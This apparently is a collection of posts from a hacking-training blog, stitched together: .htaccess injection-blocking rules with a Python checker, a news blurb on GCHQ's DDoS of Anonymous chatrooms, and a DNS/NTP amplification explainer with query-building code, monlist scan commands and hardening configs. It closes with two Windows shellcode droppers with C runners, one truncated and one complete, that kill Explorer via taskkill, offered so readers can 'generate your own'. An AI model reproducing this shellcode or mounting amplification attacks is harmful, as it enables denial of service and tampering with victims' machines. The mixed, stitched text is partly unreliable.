RewriteCond %{QUERY_STRING} (;|<|>|'|-|"|\)|%0A|%0D|%22|%27|%3C|%3E|).*(/\*|union|select|insert|drop|delete|update|cast|create|char|convert|alter|declare|order|script|set|md5|benchmark|encode) [NC,OR]
RewriteCond %{QUERY_STRING} (sp_executesql) [NC]
RewriteRule ^(.*)$ - [F,L]
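
A rule set this long is easiest to check offline before it goes anywhere near a production .htaccess. The following is an added example, not part of the original post or of Team Arizona's script: it carries a subset of the query-string patterns above into Python's re module, runs constructed sample query strings through them, and includes a small lint that catches the empty alternatives ("||" and "|)") that two of the published patterns carried, which match every request. The sample query strings are constructed for the demonstration.

```python
import re

# Subset of the query-string RewriteCond patterns from the .htaccess above, carried over
# into Python's re module; Apache's [NC] flag becomes re.IGNORECASE. Apache uses PCRE,
# so confirm anything exotic against a real server, but these patterns behave the same.
QUERY_RULES = [
    (r"[a-zA-Z0-9_]=http://", 0),
    (r"(\.\./|\.\.)", 0),
    (r"(\<|%3C).*script.*(\>|%3E)", re.IGNORECASE),
    (r"base64_(en|de)code[^(]*\([^)]*\)", re.IGNORECASE),
    (r"GLOBALS(=|\[|\%[0-9A-Z]{0,2})", 0),
    (r"union([^s]*s)+elect", re.IGNORECASE),
    (r"(\./|\../|\.../)+(motd|etc|bin)", re.IGNORECASE),
]

# The query-string rule as it was published, with "||" inside the group: the empty
# alternative matches every query string, so this one line forbids all requests.
BROKEN_RULE = (r"(<|>|'|%0A|%0D|%27|%3C|%3E||-)", re.IGNORECASE)


def has_empty_alternative(pattern):
    """Static lint: true if an alternation group has an empty branch ("(|", "||" or "|)")."""
    return re.search(r"\(\||\|\||\|\)", pattern) is not None


def first_matching_rule(query_string, rules=QUERY_RULES):
    """Return the first pattern that would forbid this query string, or None if it passes."""
    for pattern, flags in rules:
        if re.search(pattern, query_string, flags):
            return pattern
    return None


def would_block(query_string, rules=QUERY_RULES):
    return first_matching_rule(query_string, rules) is not None


if __name__ == "__main__":
    # Constructed sample query strings, benign and hostile-looking, to exercise the rule set.
    samples = ["id=42&page=2", "file=../../etc/passwd",
               "q=1 UNION SELECT 1,2", "u=http://example.invalid/x.txt"]
    for qs in samples:
        print("%-34s -> %s" % (qs, first_matching_rule(qs)))
    print("published rule with '||' blocks a harmless query:", would_block("id=42", [BROKEN_RULE]))
    print("lint flags it:", has_empty_alternative(BROKEN_RULE[0]))
```

Running the lint over every pattern before deployment, and a handful of known-good query strings through the set afterwards, catches the two failure modes that matter most for a blanket rule like this: a pattern that silently matches everything, and a pattern that blocks traffic the site needs. Python's re and Apache's PCRE differ in a few corners (possessive quantifiers, some escapes), so a final check on a staging Apache is still worthwhile.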




Snowden Leak GCHQ DDoSed Anonymous & LulzSec's Chatrooms (3/19/2014)

Hello every one, this post contains Weekly Presentation from Ec-Council.



Topic from the Presentation:

"Snowden Leak GCHQ DDoSed Anonymous & LulzSec's Chatrooms"



British intelligence ran denial-of-service attacks against chatrooms used by Anonymous and LulzSec, according to an investigation by NBC News carried out with Snowden confidant Glenn Greenwald.

Documents leaked by the NSA whistleblower record how a GCHQ unit known as the Joint Threat Research Intelligence Group (JTRIG) used a packet-flood operation dubbed Rolling Thunder to scare away 80 per cent of the users of Anonymous internet chat rooms.
Intelligence agents also infiltrated the chatrooms, identifying one hacktivist who had siphoned confidential data from PayPal and another who had taken part in attacks on government websites.


Link for the presentation:

https://aspen.eccouncil.org/WeeklyMondayPresentation.aspx


Remember that you need to register to download the presentation.



DNS AND NTP Based Amplification Attacks Unknown rwxr-xr-x 0 3/16/2014

./Arizona Team

Credits: Cyber Security and Privacy Foundation

DNS reflection is a method used to perform a Distributed Denial of Service (DDoS) attack. Attackers have used it to take down critical network infrastructure and resources by turning DNS servers into the source of the attack traffic.

The DNS server answers the query with a response that is considerably larger than the query itself, and that size difference is what produces the DDoS traffic. DNS runs over UDP, so there is no handshake as with TCP and nothing verifies the source address: an attacker who puts a spoofed source IP address in the DNS request can carry out the attack by abusing open or misconfigured DNS servers.

These attacks are usually categorized into three types:

  • Repeating Query attack.
  • Varying Query attack.
  • Distributed attack.

The attack can be made even more powerful by amplification. To get an amplification attack working, the attacker takes advantage of two features of the DNS protocol:

The first is that a DNS response is generally larger than the DNS query that produced it, so the attacker sends a small spoofed query that generates a large response.


The second is that DNS queries use UDP transport, which makes it easy for an attacker to spoof the source address.

The attacker first identifies a set of resolvers that can be used as reflectors. Then, from compromised machines across the globe, the attacker sends DNS queries to the reflecting resolvers with the source IP address spoofed to that of the victim. The reflecting resolvers process the queries and send their responses to the victim's IP address. A botnet issuing many amplified requests lets the attacker mount a large attack with only a small amount of outgoing bandwidth.


At the victim's side this arrives as a bombardment of unrequested DNS responses from many nameservers. Tracing the attacker is very hard, because the packets reaching the victim never come from the attacker's machine directly, and blocking the responses individually is harder still.
There are tools available on the internet that perform this type of attack, although mitigations and patches have reduced the number of open or misconfigured DNS servers available for abuse.
One tool that is a simple implementation of this attack was written by Mark Osborne.
General Info:


The tool is written in C and uses the built-in network libraries.
The attacker needs to provide basic information such as
SPOOFED_IP, TARGET DNS, RESOLVER QUERY


It uses raw sockets and implements the UDP and DNS header structures.
Working:


After accepting the input parameters, it queries the DNS server with the spoofed source IP address provided by the attacker.
It then prints information such as the input parameters, the query length and the overall DNS message length.
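An added example that is not part of the post and not Mark Osborne's tool: the DNS wire format the text describes, built and parsed in Python so that the query length, the response length and the amplification factor can be measured from the bytes themselves. It builds a query (with the EDNS0 OPT record that lets a resolver return answers larger than the classic 512-byte UDP limit), parses a response including compression pointers, and divides the two sizes. No packet is sent and no source address is spoofed; the response is constructed inside the example.

```python
import struct

TYPE_TXT, TYPE_OPT, TYPE_ANY, CLASS_IN = 16, 41, 255, 1


def encode_name(name):
    """Encode a dotted hostname as DNS labels (RFC 1035 section 3.1)."""
    labels = [lbl for lbl in name.strip(".").split(".") if lbl]
    return b"".join(bytes([len(lbl)]) + lbl.encode("ascii") for lbl in labels) + b"\x00"


def build_query(name, qtype=TYPE_ANY, txid=0x1234, edns_udp_size=4096):
    """Build a query in wire format. Plain DNS caps UDP answers at 512 bytes
    (RFC 1035); the EDNS0 OPT pseudo-record (RFC 6891) advertises a larger
    buffer, which is what lets a reflector return a multi-kilobyte answer in
    one datagram instead of truncating it and forcing a TCP retry."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 1 if edns_udp_size else 0)  # RD=1
    question = encode_name(name) + struct.pack("!HH", qtype, CLASS_IN)
    opt = b""
    if edns_udp_size:
        # NAME=root, TYPE=OPT, CLASS field carries the UDP payload size, TTL=0, RDLEN=0
        opt = b"\x00" + struct.pack("!HHIH", TYPE_OPT, edns_udp_size, 0, 0)
    return header + question + opt


def build_sample_response(name, txid, txt_strings, qtype=TYPE_ANY):
    """Constructed answer (not captured traffic): echoes the question and
    returns one TXT record per string, naming each record with a compression
    pointer (0xC00C) back to the question name at offset 12."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(txt_strings), 0, 0)  # QR=1 RD=1 RA=1
    question = encode_name(name) + struct.pack("!HH", qtype, CLASS_IN)
    answers = b""
    for s in txt_strings:
        rdata = bytes([len(s)]) + s.encode("ascii")   # one <character-string>, at most 255 bytes
        answers += b"\xC0\x0C" + struct.pack("!HHIH", TYPE_TXT, CLASS_IN, 300, len(rdata)) + rdata
    return header + question + answers


def read_name(msg, off):
    """Decode a possibly compressed name (RFC 1035 section 4.1.4).
    Returns (name, offset just past the name in the original byte stream)."""
    labels, resume, hops = [], None, 0
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                      # two-byte compression pointer
            if resume is None:
                resume = off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            hops += 1
            if hops > 64:
                raise ValueError("compression pointer loop")
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (resume if resume is not None else off)


def parse_message(msg):
    """Parse the header, the question section and every resource record
    (the OPT pseudo-record is an ordinary record in the additional section)."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    off, questions, records = 12, [], []
    for _ in range(qd):
        name, off = read_name(msg, off)
        qtype, _qclass = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        questions.append((name, qtype))
    for _ in range(an + ns + ar):
        name, off = read_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        records.append((name, rtype, msg[off:off + rdlen]))
        off += rdlen
    if off != len(msg):
        raise ValueError("trailing bytes after the last record")
    return {"id": txid, "is_response": bool(flags & 0x8000), "truncated": bool(flags & 0x0200),
            "questions": questions, "records": records, "size": len(msg)}


def amplification_factor(query, response):
    """Bytes delivered to the spoofed victim per byte the attacker sent (UDP payload only)."""
    q, r = parse_message(query), parse_message(response)
    if not r["is_response"] or r["id"] != q["id"]:
        raise ValueError("response does not answer this query")
    return r["size"] / q["size"]


if __name__ == "__main__":
    q = build_query("example.com")
    r = build_sample_response("example.com", 0x1234, ["A" * 200] * 20)
    print(f"query {len(q)} bytes, response {len(r)} bytes, "
          f"amplification x{amplification_factor(q, r):.1f}")
```

The 40-byte ANY query with EDNS0 against the constructed 20-record answer gives a factor above 100 on payload alone; without the OPT record the same answer would have to be truncated to fit in 512 bytes, which is why amplification tooling always sends EDNS0.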

Mitigations:


1. Firewall: A firewall can drop packets from unknown or unwanted IP addresses. A suitable configuration reduces the attack to some extent, but only partially, because the reflecting source addresses change over time.


2. BCP38: Amplification depends on spoofed source IP addresses. BCP38 (ingress filtering) is the mechanism that verifies that packets leaving a network carry source addresses that belong to it; ISPs are responsible for implementing it.


3. Third-party services: Premium services such as CloudFlare absorb this type of DDoS and also conceal the origin IP address of the host.


4. Configuring DNS: Configure the server to identify stealth DNS requests and to refuse recursion for non-local IP addresses, making sure the DNS server is not an open resolver.
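An added configuration example for point 4, not from the post: the BIND `named.conf` settings that turn an open resolver into one that recurses only for its own networks, with the open setting shown commented out beside it. The address ranges are placeholders (documentation prefixes) to be replaced with your own.

```conf
// Top-level ACL for the networks this server should recurse for.
acl "trusted" { 127.0.0.0/8; 192.0.2.0/24; };

options {
    // Weak (the open-resolver case): the server recurses for anyone, so a
    // spoofed query from the internet is answered towards the victim's address.
    //   recursion yes;
    //   allow-recursion { any; };

    // Hardened: recurse only for our own networks; everyone else gets REFUSED.
    recursion yes;
    allow-recursion { "trusted"; };
    allow-query-cache { "trusted"; };

    // An authoritative-only server should not recurse at all:
    //   recursion no;

    // Response Rate Limiting (BIND 9.9.4 and later) caps identical answers per
    // client address, which blunts amplification even for the zones the
    // server must answer for the whole internet.
    rate-limit {
        responses-per-second 5;
        window 5;
    };
};
```

Verify from a host outside the trusted ranges with `dig @<server> www.example.com A`: a closed resolver answers with `status: REFUSED`, while an open one returns records with the `ra` flag set.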


NTP Based Amplification Attacks.


It is well known that internet hosts across the globe use the Network Time Protocol (NTP) to synchronize their clocks. It is used on systems of every type and size because it is accurate and reliable enough for authentication services, servers and phones alike. NTP is commonly used to synchronize time over the internet and on local networks: if you have ever set the time on your PC or router from an internet time server, you have used NTP. With NTP used this widely, it is important that the NTP infrastructure is secure and trustworthy.


NTP runs on UDP port 123. It is one of the protocols that administrators forget about once it is configured, so NTP daemons are often not updated regularly, and that neglect is what makes the NTP-based attacks described below possible.


NTP-based attacks have become quite common recently, with gaming and online services the usual targets. Like DNS, NTP is a UDP-based protocol that can return a large reply to a small request. In a reflection attack the attacker spoofs the source IP address of his packets to the victim's address and sends requests to vulnerable servers on the internet; when those servers reply, the replies go to the forged address, that is, to the victim. If the attacker sends requests to many vulnerable servers and they all reply to the victim at the same time, the victim faces a huge amount of traffic.


An NTP reflection attack becomes far more powerful when it is amplified, which happens when a small request produces a large reply. The attacker generates a large number of UDP packets with a spoofed source IP and sends them to NTP servers on port 123 that support the MONLIST command. (MONLIST is a remote command in older versions of ntpd that returns the list of the last 600 hosts that connected to the server.) MONLIST is a useful reconnaissance tool for attackers in its own right, and if the server's monitoring list is fully populated the response to a single MONLIST request is about 206 times the size of the request, which turns the server into a DDoS amplifier aimed at the victim.


ShodanHQ Results for NTP

The below image shows how the Amplification attack works.

NSE script to scan for open NTP servers (UDP port 123):

> nmap -sU -p 123 --script=ntp-monlist <ip address of target>

ntpdc monlist command:
> ntpdc -c monlist <ip address of target>

ntpdc help:
> ntpdc --help
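An added example, not from the post and not ntpd's code: a small decoder for NTP mode-7 datagrams that recognises the monlist request the commands above send and the replies it provokes, plus a summary over (src, dst, payload) tuples taken from a capture on UDP/123 that makes the address being reflected at stand out. The header layout is the 8-byte mode-7 header from ntpd's ntp_request.h; the sample traffic, addresses and the zeroed list entries are constructed for the example.

```python
import struct
from collections import defaultdict

MODE_PRIVATE = 7                                # NTP mode 7: ntpd's private ntpdc protocol
IMPL_XNTPD = 3                                  # implementation number used by ntpd
REQ_MON_GETLIST, REQ_MON_GETLIST_1 = 20, 42     # the two request codes that return the monlist
MONLIST_REQUESTS = {REQ_MON_GETLIST, REQ_MON_GETLIST_1}
MONLIST_ITEM_SIZE = 72                          # one info_monitor_1 entry; 6 per 440-byte reply
FRAME_OVERHEAD = 14 + 20 + 8                    # Ethernet + IPv4 + UDP headers, for on-the-wire sizes


def parse_mode7_header(payload):
    """Decode the 8-byte mode-7 header shared by requests and replies
    (struct req_pkt / resp_pkt in ntpd's ntp_request.h). Returns None for
    anything that is not an NTP mode-7 datagram, e.g. an ordinary mode-3
    client packet, whose first byte has 3 in its low three bits."""
    if len(payload) < 8:
        return None
    rm_vn_mode, _auth_seq, impl, request, err_nitems, mbz_itemsize = struct.unpack("!BBBBHH", payload[:8])
    if rm_vn_mode & 0x07 != MODE_PRIVATE:
        return None
    return {
        "response": bool(rm_vn_mode & 0x80),    # bit 7: reply rather than request
        "more": bool(rm_vn_mode & 0x40),        # bit 6: more reply packets follow
        "version": (rm_vn_mode >> 3) & 0x07,
        "implementation": impl,
        "request": request,
        "error": err_nitems >> 12,              # high 4 bits
        "nitems": err_nitems & 0x0FFF,          # low 12 bits
        "itemsize": mbz_itemsize & 0x0FFF,
    }


def is_monlist_request(payload):
    h = parse_mode7_header(payload)
    return h is not None and not h["response"] and h["request"] in MONLIST_REQUESTS


def is_monlist_response(payload):
    h = parse_mode7_header(payload)
    return h is not None and h["response"] and h["request"] in MONLIST_REQUESTS


def build_monlist_request():
    """The 8-byte header-only MON_GETLIST_1 probe: version 2 + mode 7 (0x17),
    implementation XNTPD, request 42, no items. This is the form scanners send."""
    return struct.pack("!BBBBHH", 0x17, 0, IMPL_XNTPD, REQ_MON_GETLIST_1, 0, 0)


def build_sample_monlist_response(nitems=6, more=False):
    """Constructed reply (not captured traffic): the header plus nitems zeroed
    72-byte entries. A full list of 600 hosts comes back as 100 of these."""
    rm_vn_mode = 0x80 | (0x40 if more else 0) | (2 << 3) | MODE_PRIVATE
    header = struct.pack("!BBBBHH", rm_vn_mode, 0, IMPL_XNTPD, REQ_MON_GETLIST_1, nitems, MONLIST_ITEM_SIZE)
    return header + b"\x00" * (MONLIST_ITEM_SIZE * nitems)


def summarize(datagrams):
    """datagrams: iterable of (src_ip, dst_ip, udp_payload) seen on UDP/123.
    Requests are credited to their (possibly spoofed) source and replies to
    their destination, so the address being reflected at shows up by ratio."""
    req_bytes, resp_bytes, resp_pkts = defaultdict(int), defaultdict(int), defaultdict(int)
    for src, dst, payload in datagrams:
        if is_monlist_request(payload):
            req_bytes[src] += len(payload) + FRAME_OVERHEAD
        elif is_monlist_response(payload):
            resp_bytes[dst] += len(payload) + FRAME_OVERHEAD
            resp_pkts[dst] += 1
    report = {}
    for ip in set(req_bytes) | set(resp_bytes):
        sent, got = req_bytes[ip], resp_bytes[ip]
        report[ip] = {"request_bytes": sent, "response_bytes": got,
                      "response_packets": resp_pkts[ip],
                      "amplification": round(got / sent, 1) if sent else None}
    return report


if __name__ == "__main__":
    victim, reflector = "198.51.100.7", "203.0.113.5"      # constructed sample addresses
    traffic = [(victim, reflector, build_monlist_request())]
    traffic += [(reflector, victim, build_sample_monlist_response(6, more=i < 99)) for i in range(100)]
    print(summarize(traffic)[victim])
```

For the 8-byte scanner probe the sample works out to 100 reply frames of 482 bytes against one 50-byte request frame. The 206x figure quoted above is the same 48,200 bytes measured against the larger 234-byte request frame that the ntpdc client itself sends (48200 / 234 is just under 206); the amplification depends on which request form the attacker uses, and the reflector replies the same way to both.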

Mitigation:

With UDP-based amplification attacks on the rise, enterprises need to take the necessary mitigation steps.


NTP amplification attacks, like all UDP-based amplification attacks, depend entirely on spoofing the source IP address; if the attacker cannot spoof the victim's address, he can only DDoS himself.
One of the easiest mitigations is updating ntpd to version 4.2.7p26 or later, which removes the MONLIST query entirely.


Another mitigation is to start the NTP daemon with a configuration whose default restrict line has noquery enabled; this disables access to MONLIST (and the other mode 6 and mode 7 queries).


Another mitigation is to ensure that BCP38 is followed on your network. BCP38 is a "Best Current Practice" published by the IETF that describes methods for filtering out packets injected into a network with a spoofed source address, and it goes a long way toward keeping your network from being used in DDoS attacks.
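An added configuration example for the noquery mitigation, not from the post: the `ntp.conf` restrict lines that refuse mode 6/7 queries from everyone except localhost, with the weak state described in the comment at the top. The pool hostnames are placeholders for your own time sources.

```conf
# Weak: ntpd with no restrict lines answers mode-7 (ntpdc) queries, monlist
# included, from any address, so a full list goes out as 100 x 440-byte replies
# to whatever source address the request claimed.
#
# Hardened: a default restriction that refuses queries and changes from
# everyone, then explicit exceptions for localhost.
#   noquery   refuse ntpq/ntpdc (mode 6/7) queries, which covers monlist
#   nomodify  refuse runtime configuration changes
#   notrap    refuse the mode 6 trap service
#   nopeer    do not let remote hosts form peer associations
#   kod       send Kiss-o'-Death packets to clients that exceed the rate limit
restrict default kod nomodify notrap nopeer noquery
restrict -6 default kod nomodify notrap nopeer noquery
restrict 127.0.0.1
restrict ::1

# Time sources; replies from these are still accepted under the default restriction.
server 0.pool.ntp.org iburst
server 1.pool.ntp.org iburst

# Builds older than 4.2.7p26 still implement monlist; stop collecting the
# monitoring list so there is nothing to return even if a query gets through.
disable monitor
```

After restarting ntpd, re-run the `ntpdc -c monlist` command from an outside host: a hardened server gives no reply (the request times out), and the nmap ntp-monlist script reports nothing.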



Inserting Fake Update DNS in Windows 8 through shellcode Unknown rwxr-xr-x 0 3/09/2014

./Arizona Team

This post elaborates how to add a fake update DNS entry with the help of shellcode. In the CEH class we have already seen how Metasploit can be used to make changes to DNS; this is a more advanced dropper that can inject into any process, and for the current example I have taken the explorer process.

The embedded code is as follows. Go through the code and understand the logic, then generate your own; remember that you need an updated Metasploit to replicate the scenario. If you have any problem understanding it, send your query to instructor@arizonainfotech.com or reach us through our Facebook page:

Code:
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <windows.h>

// The byte string is cut off in the post (it stops at "\xb8"), so this compiles but the shellcode is incomplete.
char code[] = "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8";

int main() {
    printf("Shellcode Length is : %zu\n", strlen(code));
    system("PAUSE");
    DWORD old;  // .data is not executable under DEP; make the buffer executable before jumping into it
    VirtualProtect(code, sizeof(code), PAGE_EXECUTE_READWRITE, &old);
    int (*_13)() = (int (*)())code;   // treat the bytes as a function and call it (32-bit build only)
    _13();
}



Windows 8 Remote Explorer Kill with Shell Code Unknown rwxr-xr-x 0 3/05/2014

./Arizona Team

This post elaborates how to take down Explorer with the help of shellcode. In the CEH class we created a dropper with an exe extension; this is a more advanced dropper that can inject into any process, and for the current example I have taken the explorer process.

The assembly logic flow is shown below. It is a more advanced form of what was shown in the buffer overflow class, i.e. working directly with the memory addresses of all the elements. Reading the listing: the code walks the PEB loader list (FS:[30] -> Ldr -> InInitializationOrderModuleList) to the third loaded module and adds the hard-coded offset 0x2062 to its base, writes the string "cmd /k taskkill /im explorer.exe /im cmd.exe /f" onto the stack one dword at a time (the MOV ECX,imm / SUB ECX,EAX pairs with EAX = 11111111 only disguise the constants), pushes ten arguments, which matches the CreateProcessA calling convention, and calls that address, then walks the list again to the second module and calls base+0x31526. Because the offsets are fixed, the shellcode only works on the exact OS build they were taken from:

00401000 > $ 33F6           XOR ESI,ESI
00401002   . 33C9           XOR ECX,ECX
00401004   . 64:8B71 30     MOV ESI,DWORD PTR FS:[ECX+30]
00401008   . 8B76 0C        MOV ESI,DWORD PTR DS:[ESI+C]
0040100B   . 8B76 1C        MOV ESI,DWORD PTR DS:[ESI+1C]
0040100E   . 33DB           XOR EBX,EBX
00401010   > 43             INC EBX
00401011   . 8B6E 08        MOV EBP,DWORD PTR DS:[ESI+8]
00401014   . 8B7E 20        MOV EDI,DWORD PTR DS:[ESI+20]
00401017   . 8B36           MOV ESI,DWORD PTR DS:[ESI]
00401019   . B8 11111111    MOV EAX,11111111
0040101E   . B9 14111111    MOV ECX,11111114
00401023   . 2BC8           SUB ECX,EAX
00401025   . 8BD1           MOV EDX,ECX
00401027   . 3BDA           CMP EBX,EDX
00401029   .^75 E5          JNZ SHORT messageb.00401010
0040102B   . B9 73311111    MOV ECX,11113173
00401030   . 2BC8           SUB ECX,EAX
00401032   . 03E9           ADD EBP,ECX
00401034   . 8BD4           MOV EDX,ESP
00401036   . B9 10211111    MOV ECX,11112110
0040103B   . 2BC8           SUB ECX,EAX
0040103D   . 2BD1           SUB EDX,ECX
0040103F   . B9 636D6420    MOV ECX,20646D63
00401044   . 890A           MOV DWORD PTR DS:[EDX],ECX
00401046   . B9 2F6B2074    MOV ECX,74206B2F
0040104B   . 894A 04        MOV DWORD PTR DS:[EDX+4],ECX
0040104E   . B9 61736B6B    MOV ECX,6B6B7361
00401053   . 894A 08        MOV DWORD PTR DS:[EDX+8],ECX
00401056   . B9 696C6C20    MOV ECX,206C6C69
0040105B   . 894A 0C        MOV DWORD PTR DS:[EDX+C],ECX
0040105E   . B9 2F696D20    MOV ECX,206D692F
00401063   . 894A 10        MOV DWORD PTR DS:[EDX+10],ECX
00401066   . B9 6578706C    MOV ECX,6C707865
0040106B   . 894A 14        MOV DWORD PTR DS:[EDX+14],ECX
0040106E   . B9 6F726572    MOV ECX,7265726F
00401073   . 894A 18        MOV DWORD PTR DS:[EDX+18],ECX
00401076   . B9 2E657865    MOV ECX,6578652E
0040107B   . 894A 1C        MOV DWORD PTR DS:[EDX+1C],ECX
0040107E   . B9 202F696D    MOV ECX,6D692F20
00401083   . 894A 20        MOV DWORD PTR DS:[EDX+20],ECX
00401086   . B9 20636D64    MOV ECX,646D6320
0040108B   . 894A 24        MOV DWORD PTR DS:[EDX+24],ECX
0040108E   . B9 2E657865    MOV ECX,6578652E
00401093   . 894A 28        MOV DWORD PTR DS:[EDX+28],ECX
00401096   . B9 31407711    MOV ECX,11774031
0040109B   . 2BC8           SUB ECX,EAX
0040109D   . 894A 2C        MOV DWORD PTR DS:[EDX+2C],ECX
004010A0   . 33DB           XOR EBX,EBX
004010A2   . 8BF4           MOV ESI,ESP
004010A4   . B9 65111111    MOV ECX,11111165
004010A9   . 2BC8           SUB ECX,EAX
004010AB   . 8D4E AC        LEA ECX,DWORD PTR DS:[ESI-54]
004010AE   . 51             PUSH ECX
004010AF   . 8D4E BC        LEA ECX,DWORD PTR DS:[ESI-44]
004010B2   . 51             PUSH ECX
004010B3   . 53             PUSH EBX
004010B4   . 53             PUSH EBX
004010B5   . B9 31131111    MOV ECX,11111331
004010BA   . 2BC8           SUB ECX,EAX
004010BC   . 51             PUSH ECX
004010BD   . 53             PUSH EBX
004010BE   . 53             PUSH EBX
004010BF   . 53             PUSH EBX
004010C0   . 52             PUSH EDX
004010C1   . 53             PUSH EBX
004010C2   . FFD5           CALL EBP
004010C4   . 33F6           XOR ESI,ESI
004010C6   . 33C9           XOR ECX,ECX
004010C8   . 64:8B71 30     MOV ESI,DWORD PTR FS:[ECX+30]
004010CC   . 8B76 0C        MOV ESI,DWORD PTR DS:[ESI+C]
004010CF   . 8B76 1C        MOV ESI,DWORD PTR DS:[ESI+1C]
004010D2   . 33DB           XOR EBX,EBX
004010D4   > 43             INC EBX
004010D5   . 8B6E 08        MOV EBP,DWORD PTR DS:[ESI+8]
004010D8   . 8B7E 20        MOV EDI,DWORD PTR DS:[ESI+20]
004010DB   . 8B36           MOV ESI,DWORD PTR DS:[ESI]
004010DD   . B8 11111111    MOV EAX,11111111
004010E2   . B9 13111111    MOV ECX,11111113
004010E7   . 2BC8           SUB ECX,EAX
004010E9   . 8BD1           MOV EDX,ECX
004010EB   . 3BDA           CMP EBX,EDX
004010ED   .^75 E5          JNZ SHORT messageb.004010D4
004010EF   . B8 11111111    MOV EAX,11111111
004010F4   . B9 37261411    MOV ECX,11142637
004010F9   . 2BC8           SUB ECX,EAX
004010FB   . 03E9           ADD EBP,ECX
004010FD   . FFD5           CALL EBP


The embedded code is as follows. Go through the code and understand the logic, then generate your own; remember that you need an updated Metasploit to replicate the scenario. If you have any problem understanding it, send your query to instructor@arizonainfotech.com or reach us through our Facebook page:

Code:
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <windows.h>

// x86 (32-bit) shellcode matching the listing above: walks the PEB loader list
// for module bases, builds "cmd /k taskkill /im explorer.exe /im cmd.exe /f" on
// the stack and calls base+0x2062 of the third module, then base+0x31526 of the
// second. Both offsets are hard-coded for one OS build; compile as 32-bit.
char code[] = "\x33\xF6\x33\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x33"
"\xDB\x43\x8B\x6E\x08\x8B\x7E\x20\x8B\x36\xB8\x11\x11\x11\x11\xB9\x14"
"\x11\x11\x11\x2B\xC8\x8B\xD1\x3B\xDA\x75\xE5\xB9\x73\x31\x11"
"\x11\x2B\xC8\x03\xE9\x8B\xD4\xB9\x10\x21\x11\x11\x2B\xC8\x2B\xD1\xB9"
"\x63\x6D\x64\x20\x89\x0A\xB9\x2F\x6B\x20\x74\x89\x4A\x04\xB9"
"\x61\x73\x6B\x6B\x89\x4A\x08\xB9\x69\x6C\x6C\x20\x89\x4A\x0C\xB9\x2F"
"\x69\x6D\x20\x89\x4A\x10\xB9\x65\x78\x70\x6C\x89\x4A\x14\xB9"
"\x6F\x72\x65\x72\x89\x4A\x18\xB9\x2E\x65\x78\x65\x89\x4A\x1C\xB9\x20"
"\x2F\x69\x6D\x89\x4A\x20\xB9\x20\x63\x6D\x64\x89\x4A\x24\xB9"
"\x2E\x65\x78\x65\x89\x4A\x28\xB9\x31\x40\x77\x11\x2B\xC8\x89\x4A\x2C"
"\x33\xDB\x8B\xF4\xB9\x65\x11\x11\x11\x2B\xC8\x8D\x4E\xAC\x51"
"\x8D\x4E\xBC\x51\x53\x53\xB9\x31\x13\x11\x11\x2B\xC8\x51\x53\x53\x53"
"\x52\x53\xFF\xD5\x33\xF6\x33\xC9\x64\x8B\x71\x30\x8B\x76\x0C"
"\x8B\x76\x1C\x33\xDB\x43\x8B\x6E\x08\x8B\x7E\x20\x8B\x36\xB8\x11\x11"
"\x11\x11\xB9\x13\x11\x11\x11\x2B\xC8\x8B\xD1\x3B\xDA\x75\xE5"
"\xB8\x11\x11\x11\x11\xB9\x37\x26\x14\x11\x2B\xC8\x03\xE9\xFF\xD5";

int main() {
    printf("Shellcode Length is : %zu\n", strlen(code));
    system("PAUSE");
    // The buffer lives in .data, which is not executable under DEP; make it so first.
    DWORD old;
    VirtualProtect(code, sizeof(code), PAGE_EXECUTE_READWRITE, &old);
    int (*_13)() = (int (*)())code;   // treat the bytes as a function and call it
    _13();
}
